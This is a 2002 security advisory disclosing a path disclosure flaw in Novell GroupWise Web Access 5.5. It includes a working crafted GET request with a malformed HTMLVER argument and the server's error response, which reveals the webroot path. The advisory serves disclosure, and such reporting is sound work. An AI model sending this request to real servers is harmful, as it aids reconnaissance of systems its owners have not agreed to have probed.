Novell GroupWise Web Access Path Disclosure Vulnerability

Type

Input Validation Error

Release Date

February 28, 2002

Product / Vendor

Novell GroupWise, the premier communication and collaboration tool for the one Net environment, helps you tackle some of the toughest business challenges you face. Whether your organization is small, midsize or large, your employees need e-mail, calendaring, document management and other collaborative tools to open up the lines of communication and keep your business running efficiently.

http://www.novell.com/products/groupwise/

Summary

If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the GroupWise Web Access.

Exploit

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

Tested

Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5

Vulnerable

GroupWise Web Access 5.5 (And may be other.)

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net